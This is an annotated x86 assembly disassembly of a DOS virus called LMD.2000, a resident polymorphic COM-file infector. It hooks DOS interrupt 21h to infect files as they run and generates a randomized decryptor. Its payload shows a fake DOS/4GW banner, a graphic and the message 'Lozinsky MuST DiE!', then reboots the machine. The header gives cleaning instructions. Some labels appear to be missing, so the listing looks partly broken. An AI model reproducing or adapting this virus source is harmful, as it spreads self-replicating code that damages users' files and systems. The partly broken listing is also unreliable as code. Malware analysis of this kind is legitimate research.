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; LMD.2000
; Resident Polymorphic COM Infector
; Virus Reroutes Int 21h Handler through Int 84h and uses Int 84h for
; virus function calls. Int 21h Function 4Bh (Set Execution State) is hooked
; for infection routine. Virus prepends its body to files and writes 2000
; original bytes to end of file. Polymorphic routine makes 128 random
; one byte instructions and then fills in crypt information.
; Cleaning Instructions - Overwrite First 2000 Bytes with Last 2000 Bytes
; Detection - No scanners detect this beastie yet.
; Research and Disassembly by PakiLad 05/03/97
seg000 segment byte public 'CODE' use16
assume cs:seg000
org 100h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
db 128 dup (90h) ; Buffer For Cryptor
jmp VirusStart
OneByteTable db 26h ; SEGES
db 27h ; DAA
db 2Eh ; SEGCS
db 2Fh ; DAS
db 0FBh ; STI
db 37h ; AAA
db 3Eh ; SEGDS
db 3Fh ; AAS
db 40h ; INC AX
db 42h ; INC DX
db 46h ; INC SI
db 48h ; DEC AX
db 4Ah ; DEC DX
db 4Eh ; DEC SI
db 90h ; NOP
db 92h ; XCHG AX, DX
InfMarker db 'LMD'
GetRand15 proc near
push cx
in ax, 40h ; Get Random Number
xchg ax, cx
xor ax, cx
loop MakeRandLoop
xchg ax, cx
in ax, 40h ; Get Random Number
inc cx
xor ax, cx
and ax, 0Fh ; Number 0 - 15
pop cx
GetRand15 endp
GetOneByteIns proc near
push di
mov di, offset OneByteTable
call GetRand15
add di, ax
mov al, cs:[di]
pop di
GetOneByteIns endp
CopyOverVir proc near
push bx
push es
push ds
push cs
pop es ; ES = CS
assume es:seg000
mov di, offset Buffer+10h
mov si, offset start + 10h
mov cx, 2000
rep movsb
push ds
pop ax
add ax, 126
mov [RestoreSeg + 10h], ax
mov al, [LastByte + 10h]
push ax
push cs
mov ax, offset StoreLastByte + 10h
push ax
mov [LastByte + 10h], 0CBh
jmp near ptr JMPFarProg
CopyOverVir endp
pop ax
pop ds
mov [LastByte + 10h], al
pop es
assume es:nothing
pop bx
CheckGeneration proc near
in al, 40h ; Get Random Number
cmp al, 240 ; Below 240?
jb RandBelow240 ; Yes? Then JMP.
call GenerateCryptor
call GenerateCryptor
push dx
db 8Dh, 16h, 88h, 02h ; (FIXUP) LEA DX, OFFSET FAKE4DOSGW
mov ah, 9
int 21h ; Write Fake Message
pop dx
CheckGeneration endp
SetupInt84 proc near
push es
push bx
push di
xor ax, ax
mov di, 211h ; Offset of INT 84h
push ds
mov ds, ax ; DS points to IVT
assume ds:nothing
cmp word ptr [di], 0 ; Is Virus Installed?
jnz AlreadyInMem ; Yes? Then JMP.
mov ax, 3521h
int 21h ; Get Int 21h Vectors
dec di
mov ax, es
mov [di], bx ; Set New Int 84h Offset
inc di
inc di
mov [di], ax ; Set New Int 84h Segment
cmp ax, ax
pop ds
assume ds:seg000
pop di
pop bx
pop es
SetupInt84 endp
InstallVirus proc near
push si
push di
push bx
mov ax, 5803h
xor bx, bx
int 21h ; Get UMB Link Status
push es
push dx
mov ax, 3521h
int 21h ; Get Int 21h Vectors
mov ax, es
mov cs:Int21Ofs, bx
mov cs:Int21Seg, ax
push ds
push ds
pop ax
dec ax
mov ds, ax ; DS points to MCB
assume ds:nothing
sub word ptr ds:3, 272 ; Subtract 4352 Bytes
sub word ptr ds:12h, 272 ; Subtract 4352 Bytes From Next Seg
mov es, ds:12h ; ES points to Next Segment
xor di, di
xor si, si
mov cx, 2272
rep movsb ; Copy Virus Into Memory
xor ax, ax
mov ds, ax ; DS points to IVT
assume ds:nothing
sub word ptr ds:413h, 5 ; Subtract 5k From System Memory
mov word ptr es:1, 0 ; Set New PSP Segment
mov word ptr es:3, 272 ; Allocate 4352 Bytes
push es
pop ds ; DS = ES
assume ds:seg000
mov ax, 2521h
mov dx, offset NewInt21 + 10h
int 21h ; Set New Int 21h Vectors
pop ds
pop dx
pop es
pop bx
pop di
pop si
InstallVirus endp
FakeDOS4GW db 0Ah
db 'DOS/4GW Protected Mode Run-time Version 1.95',0Dh,0Ah
db 'Copyright (c) Rational Systems, Inc. 1990-1993',0Dh,0Ah
db 0Dh,0Ah,'$'
JMPFarProg db 0EAh
RestoreOfs dw 100h
RestoreSeg dw 0
rep movsb
pop di
pop si
pop cx
jmp short $+2
FileSize dw 0
mov al, 3
db 37h
call CheckGeneration
in al, 40h ; Get Random Number
cmp al, 16 ; Above 16?
ja NoPayload ; Yes? Then JMP.
mov ax, 11h
int 10h ; Set Video Mode 80x13
mov ax, 0A000h
mov es, ax ; ES points to Video Memory
assume es:nothing
mov di, 3222h
mov si, offset Graphic
mov cx, 80
push cx
mov cx, 80
cmp cx, 69
jb Below69
mov al, [si]
inc si
mov es:[di], al
inc di
loop DisplayLine
pop cx
loop DisplayGraphic
mov ah, 9
mov dx, offset LozMustDie
int 21h ; Write String
xor ax, ax
int 16h ; Wait For KeyPress
jmp near ptr Reboot
LozMustDie db 9,9,0Ah
db 9,0Ah
db 0Ah
db 0Ah
db 7,' Lozinsky MuST DiE!$'
xor ax, ax
call GenerateCryptor
call SetupInt84
jnz RestoreProg
call InstallVirus
mov si, offset start
mov di, 0FFFEh
xor dx, dx
push cx
push si
push di
push cs
pop es
assume es:seg000
mov si, offset RestoreRoutine
mov di, 0F9h
mov cx, 7
rep movsb ; Copy Restore Routine
mov si, [si]
mov di, offset start
add si, di
mov cx, 2000
db 0E9h,069h,0FDh ; JMP To Restore Routine
cmp ax, 4B00h ; Set Execution State?
jz InfectFile ; Yes? Then JMP.
JMPFar21 db 0EAh
Int21Ofs dw 0
Int21Seg dw 0
push ax
push bx
push cx
push es
push si
push di
push dx
push ds
push cs
pop ds
mov dx, offset NewInt24 + 10h
mov ax, 2524h
int 84h ; Set New Int 24h
pop ds
pop dx
push dx
push ds
mov ax, 4300h
push ax
int 84h ; Get File Attributes
pop ax
inc ax
push ax
push cx
and cl, 0D8h
int 84h ; Clear File Attributes
jb FileProblems ; Problems? Then JMP.
mov ax, 3D02h
int 84h ; Open File
xchg ax, bx
mov ax, 5700h
int 84h ; Get File Date/Time
push cx
push dx
push cs
pop ds ; DS = CS
mov cx, 128
mov dx, offset Buffer+10h
mov ah, 3Fh
int 84h ; Read In 128 Bytes
cmp cx, ax ; Read 128 ?
jnz RestoreTD ; No? Then JMP.
mov al, [Buffer+10h]
cmp al, 'M' ; EXE File?
jz RestoreTD ; Yes? Then JMP.
cmp al, 'Z' ; EXE File?
jz RestoreTD ; Yes? Then JMP.
call CheckForMark
jz RestoreTD ; Infected Already? Then JMP.
call DoInfect
call NotBigEnough
pop dx
pop cx
mov ax, 5701h
int 84h ; Restore File Date/Time
mov ah, 3Eh
int 84h ; Close File
pop cx
pop ax
int 84h ; Restore File Attributes
pop ds
pop dx
pop di
pop si
pop es
assume es:nothing
pop cx
pop bx
pop ax
jmp short near ptr JMPFar21
CheckForMark proc near
push di
push si
mov di, offset InfMarker
mov cx, 16
mov al, [di]
push cx
mov si, offset Buffer+10h
mov cx, 128
mov ah, [si]
cmp al, ah
jz FoundMark
inc si
loop CheckForMarker
cmp ax, cx
pop cx
jmp short DoneWithMark
pop cx
inc di
loop FindMark
cmp ax, ax
pop si
pop di
CheckForMark endp
NotBigEnough proc near
NotBigEnough endp
DoInfect proc near
mov cx, 1872
mov dx, offset OrgProgram+10h
mov ah, 3Fh
int 84h ; Read In 1872 Bytes
cmp ax, cx ; Read 1872?
jnz NotBigEnough ; No? Then JMP.
xor cx, cx
xor dx, dx
mov ax, 4202h
int 84h ; Move Pointer to End of File
jb NotBigEnough
cmp dx, 0 ; Over 64k?
jnz NotBigEnough ; Yes? Then JMP.
cmp ax, 2048 ; Under 2048 Bytes?
jb NotBigEnough ; Yes? Then JMP.
cmp ax, 60000 ; Over 60000 Bytes?
ja NotBigEnough ; Yes? Then JMP.
cmp Buffer+30h, 0
jz NotBigEnough
mov [FileSize + 10h], ax
mov ah, 40h
mov dx, offset Buffer+10h
mov cx, 2000
int 84h ; Write Original Bytes To End of File
jb NotBigEnough
call CopyOverVir
xor cx, cx
xor dx, dx
mov ax, 4200h
int 84h ; Move Pointer to Beginning
mov ah, 40h
mov dx, offset Buffer+10h
mov cx, 2000
int 84h ; Write Virus to File
DoInfect endp
Graphic db 0, 30h, 0Bh dup(0), 20h, 2 dup(0), 1Ah, 0FBh, 0EBh, 9Fh, 90h, 4 dup(0)
db 20h, 2 dup(0), 47h, 2 dup(25h), 0FDh, 0AAh, 4 dup(0), 0E0h, 0, 7, 0FAh
db 12h, 92h, 22h, 54h, 80h, 3 dup(0), 0C0h, 0Ch, 4, 0, 0A8h, 4Ah, 94h
db 55h, 40h, 3 dup(0), 0C0h, 8, 0Dh, 5Ah, 45h, 2 dup(55h), 0AAh, 0A0h
db 3 dup(0), 0C0h, 0FBh, 0F2h, 4, 95h, 54h, 0AAh, 5Dh, 0A0h, 3 dup(0)
db 0DDh, 80h, 28h, 0A2h, 49h, 2 dup(55h), 2 dup(0AAh), 3 dup(0), 0D7h
db 0Ah, 2, 19h, 25h, 5Dh, 4Ah, 6Dh, 0A4h, 3 dup(0), 0E6h, 0, 0A8h, 84h
db 95h, 7Ah, 0AAh, 56h, 0D0h, 3 dup(0), 0C0h, 48h, 2, 59h, 52h, 8Bh, 55h
db 0BAh, 0AAh, 4 dup(0), 2, 90h, 4, 4Ah, 7Dh, 55h, 6Fh, 64h, 4 dup(0)
db 24h, 25h, 5Ah, 2 dup(0AAh), 0ABh, 0B5h, 0B0h, 4 dup(0), 3 dup(1), 2Ah
db 0D5h, 0AAh, 5Ah, 0AAh, 4 dup(0), 40h, 8, 99h, 55h, 5Ah, 0DAh, 0DBh
db 53h, 4 dup(0), 15h, 52h, 44h, 0AAh, 0ABh, 57h, 0AAh, 0A9h, 80h, 4 dup(0)
db 89h, 22h, 55h, 6Dh, 55h, 5Eh, 0AAh, 0C0h, 2 dup(0), 4, 42h, 24h, 99h
db 56h, 0B5h, 56h, 0EAh, 0D1h, 5 dup(0), 91h, 25h, 5Bh, 2 dup(0AAh), 0D5h
db 4Ah, 40h, 4 dup(0), 8, 81h, 2Ah, 0AAh, 95h, 2Eh, 0E9h, 4 dup(0), 1
db 45h, 24h, 4, 56h, 0DAh, 0E9h, 54h, 80h, 2 dup(0), 8, 80h, 20h, 0, 21h
db 55h, 56h, 0DDh, 0B6h, 3 dup(0), 2, 8, 0Ah, 2 dup(0), 2Ah, 0BBh, 0AAh
db 0D4h, 80h, 4 dup(0), 40h, 44h, 1, 9, 55h, 56h, 0AAh, 40h, 2 dup(0)
db 8, 5, 1, 0, 80h, 25h, 6Dh, 0BBh, 69h, 3 dup(0), 2, 0, 0Ch, 0A0h, 5
db 6, 92h, 0C9h, 54h, 4 dup(0), 20h, 26h, 4, 0, 0A0h, 4Ah, 0D4h, 20h, 90h
db 2 dup(0), 4, 1, 19h, 61h, 0, 9, 24h, 6Bh, 55h, 1, 3 dup(0), 40h, 45h
db 4, 10h, 0C4h, 49h, 0A4h, 94h, 2Fh, 3 dup(0), 14h, 2Ah, 59h, 0, 20h
db 0E0h, 4Bh, 68h, 0A5h, 2 dup(0), 2 dup(1), 54h, 0A0h, 1, 48h, 2, 0AAh
db 0B4h, 32h, 3 dup(0), 20h, 0AAh, 5Ah, 90h, 24h, 5, 0B5h, 0A9h, 55h, 3 dup(0)
db 8Ah, 55h, 58h, 44h, 92h, 95h, 0AAh, 0A4h, 22h, 3 dup(0), 1, 6Ah, 26h
db 82h, 4Ch, 6Ah, 16h, 0B4h, 0D4h, 2 dup(0), 1, 55h, 0ADh, 9Ah, 51h, 20h
db 95h, 0EAh, 0AAh, 0B1h, 3 dup(0), 2, 0AAh, 0BDh, 2Ah, 54h, 56h, 2Ah
db 0A9h, 59h, 3 dup(0), 15h, 55h, 42h, 0A9h, 25h, 52h, 0D5h, 55h, 0EAh
db 3 dup(0), 49h, 6Dh, 5Dh, 4Ah, 94h, 0ADh, 2Ah, 49h, 34h, 3 dup(0), 25h
db 56h, 0A4h, 55h, 6Ah, 0D5h, 0A9h, 25h, 0ABh, 3 dup(0), 55h, 75h, 42h
db 0Bh, 0C5h, 2Ah, 0D4h, 92h, 0A0h, 2 dup(0), 1, 13h, 0ADh, 59h, 40h, 22h
db 0D5h, 42h, 0AAh, 47h, 3 dup(0), 4Ah, 0F6h, 0E4h, 2Ah, 95h, 5Ah, 94h
db 95h, 15h, 3 dup(0), 2Bh, 55h, 0BBh, 89h, 55h, 45h, 8Ah, 54h, 0ABh, 3 dup(0)
db 9, 2Ah, 86h, 0A4h, 25h, 55h, 51h, 55h, 17h, 3 dup(0), 2, 0, 3Bh, 2 dup(49h)
db 53h, 0A5h, 55h, 6Ah, 3 dup(0), 40h, 0Ah, 0DDh, 0A5h, 4, 0AAh, 55h, 54h
db 0AAh, 4 dup(0), 41h, 27h, 51h, 69h, 25h, 0CAh, 0A9h, 50h, 3 dup(0)
db 9, 2Ah, 0DAh, 0EAh, 0A4h, 0ABh, 12h, 40h, 5 dup(0), 4Ah, 5Fh, 54h, 52h
db 53h, 55h, 28h, 5 dup(0), 25h, 60h, 0AAh, 0A9h, 49h, 0D4h, 80h, 4 dup(0)
db 4, 0, 26h, 95h, 2Ah, 0AAh, 69h, 48h, 4 dup(0), 1, 41h, 2 dup(0), 0A9h
db 29h, 2 dup(24h), 4 dup(0), 10h, 15h, 2 dup(65h), 54h, 0A4h, 52h, 82h
db 4 dup(0), 2, 0AAh, 0A5h, 90h, 2 dup(0AAh), 29h, 15h, 4 dup(0), 10h
db 5, 5Ah, 6Ah, 0A1h, 25h, 52h, 51h, 0F8h, 3 dup(0), 1, 20h, 45h, 92h
db 54h, 92h, 0C4h, 0ABh, 8Fh, 3 dup(0), 8, 15h, 25h, 55h, 25h, 54h, 0A1h
db 25h, 80h, 3 dup(0), 5, 42h, 0A5h, 6Ah, 0A8h, 12h, 94h, 0A9h, 0C0h, 3 dup(0)
db 5, 55h, 5Ah, 2 dup(0AAh), 0A4h, 4Ah, 0A9h, 0C0h, 3 dup(0), 11h, 55h
db 0A5h, 2 dup(0AAh), 49h, 0AAh, 0A3h, 0E0h, 3 dup(0), 4, 0AAh, 0A6h, 0B5h
db 55h, 23h, 0D5h, 55h, 0E0h, 3 dup(0), 2, 2Dh, 0BAh, 0AAh, 0A2h, 4Ah
db 54h, 0A3h, 0E0h, 3 dup(0), 8, 0A5h, 5Ah, 0A4h, 94h, 25h, 0AAh, 0ABh
db 0E0h, 3 dup(0), 1, 2Ah, 0A5h, 52h, 41h, 56h, 55h, 57h, 0F0h, 4 dup(0)
db 25h, 59h, 24h, 14h, 8Ah, 55h, 57h, 0F0h, 4 dup(0), 40h, 22h, 40h, 82h
db 5Dh, 0AAh, 0AFh, 0F8h, 4 dup(0), 9, 4, 10h, 11h, 6Ah, 55h, 5Fh, 0F8h
db 6 dup(0), 1, 4Ah, 0ADh, 0D5h, 3Fh, 0F8h, 6 dup(0), 4, 0AEh, 0AAh, 2Ah
db 0BFh, 0F8h, 6 dup(0), 15h, 2Ah, 0D5h, 0AAh, 7Fh, 0F8h, 5 dup(0), 20h
db 0A2h, 55h, 2Ah, 54h, 0FFh, 0F8h, 4 dup(0), 3, 0FCh, 49h, 2Ah, 0AAh
db 53h, 0FFh, 0F8h, 4 dup(0), 3, 0FEh, 92h, 91h, 55h, 0A3h, 0FFh, 0F8h
db 4 dup(0), 3, 0FFh, 48h, 4Dh, 4Ah, 4Fh, 0FFh, 0F8h, 4 dup(0), 3, 0FFh
db 0A5h, 25h, 55h, 9Bh, 0DDh, 18h, 4 dup(0), 3, 0FFh, 0D4h, 0AAh, 0A8h
db 7Bh, 0C9h, 68h, 4 dup(0), 3, 0FFh, 0FAh, 44h, 0A5h, 0FBh, 0C1h, 68h
db 4 dup(0), 3, 0FFh, 0FAh, 95h, 53h, 0FBh, 55h, 68h, 4 dup(0), 3, 2 dup(0FFh)
db 52h, 8Fh, 0F8h, 5Dh, 18h, 4 dup(0), 3, 2 dup(0FFh), 0A4h, 5Fh, 2 dup(0FFh)
db 0F8h, 0, 0Bh dup(0FFh)
Reboot db 0EAh ; Reboot Computer
dw 0
dw 0FFFFh
GenerateCryptor proc near
push di
push ds
push cs
pop ds
mov di, offset start
mov cx, 128
push di
call GetOneByteIns
mov [di], al
inc di
loop FillWithOneByte
pop di
call GetRand15
add di, ax
mov byte ptr [di], 0BBh ; Store MOV BX Instruction
add di, 3
call GetRand15
add di, ax
mov word ptr [di], 0A8B9h ; Store MOV CX, Instruction
inc di
inc di
mov byte ptr [di], 3 ; Store Decrypt Size
inc di
call GetRand15
add di, ax
mov word ptr [di], 80BFh ; Store MOV DI
inc di
inc di
mov byte ptr [di], 1 ; Store Offset of Crypted Code
inc di
call GetRand15
add di, ax
push di
mov word ptr [di], 312Eh ; XOR [DI],
inc di
inc di
mov byte ptr [di], 1Dh ; BX
inc di
call GetRand15
add di, ax
mov word ptr [di], 4747h ; INC SI/INC SI
inc di
inc di
mov byte ptr [di], 43h ; INC AX
inc di
call GetRand15
add di, ax
mov byte ptr [di], 0E2h ; LOOP Instruction
pop ax
push di
sub di, ax
mov ax, 0FFFEh
sub ax, di
pop di
inc di
mov [di], al ; Loop Offset
pop ds
pop di
GenerateCryptor endp
Buffer db 0CDh, 20h, 125 dup (0)
LastByte db 0
OrgProgram db 1872 dup (0)
seg000 ends
end start